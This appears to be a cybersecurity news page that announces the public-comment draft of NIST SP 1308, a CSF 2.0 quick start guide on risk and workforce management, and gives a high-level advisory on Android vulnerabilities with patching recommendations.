  • Tuesday, April 22, 2025, 10:00 – 11:00 AM (GMT-05:00)
  • Tuesday, May 06, 2025, 2:00 – 3:00 PM (GMT-05:00)

Space is limited. Register for free today.

Draft CSF 2.0 Quick Start Guide: Cybersecurity, ERM & Workforce Development

Draft Released Today for Public Comment — NIST Cybersecurity Framework 2.0: Cybersecurity, Enterprise Risk Management, and Workforce Management Quick Start Guide

The Initial Public Draft (IPD) of NIST Special Publication 1308, NIST Cybersecurity Framework 2.0: Cybersecurity, Enterprise Risk Management, and Workforce Management Quick Start Guide is now published! This document shows how the Workforce Framework for Cybersecurity (NICE Framework) and the Cybersecurity Framework (CSF) 2.0 can be used together to address cybersecurity risk.

This QSG draws on three key NIST resources to enable users to align their cybersecurity, ERM, and workforce management practices in a streamlined process:

  • The Cybersecurity Framework (CSF) 2.0.
  • The Workforce Framework for Cybersecurity (NICE Framework).
  • The NIST IR 8286 series, Integrating Cybersecurity and Enterprise Risk Management (ERM).

This publication is the most recent within a portfolio of CSF 2.0 quick start guides released since February 26, 2024. These resources provide different audiences with tailored pathways into the CSF 2.0 and make the Framework easier to put into action. View all CSF 2.0 quick start guides here

The comment period for NIST Special Publication 1308, NIST Cybersecurity Framework 2.0: Cybersecurity, Enterprise Risk Management, and Workforce Management Quick Start Guide is open through April 25, 2025, at 11:59 PM.

Read the Quick Start Guide

Multiple Vulnerabilities in Google Android OS Could Allow for Remote Code Execution

Multiple vulnerabilities have been discovered in Google Android OS, the most severe of which could allow for remote code execution with no additional execution privileges needed. Android is an operating system developed by Google for mobile devices, including, but not limited to, smartphones, tablets, and watches. Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution in the context of the affected service account. Depending on the privileges associated with the service account, threat actors could install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts that are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.
Threat Intelligence
Google indicates limited, targeted exploitation of CVE-2024-43093 and CVE-2024-50302.

Systems Affected

  • Android OS patch levels prior to 2025-03-05

Risk
Government:

  • Large and medium government entities: High
  • Small government entities: High

Businesses:

  • Large and medium business entities: High
  • Small business entities: High

Home Users: Low

Recommendations

  • Apply appropriate mitigations provided by Google to vulnerable systems immediately after appropriate testing.
  • Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
  • Restrict execution of code to a virtual environment on or in transit to an endpoint system.

Reference
Android:
https://source.android.com/docs/security/bulletin/2025-03-01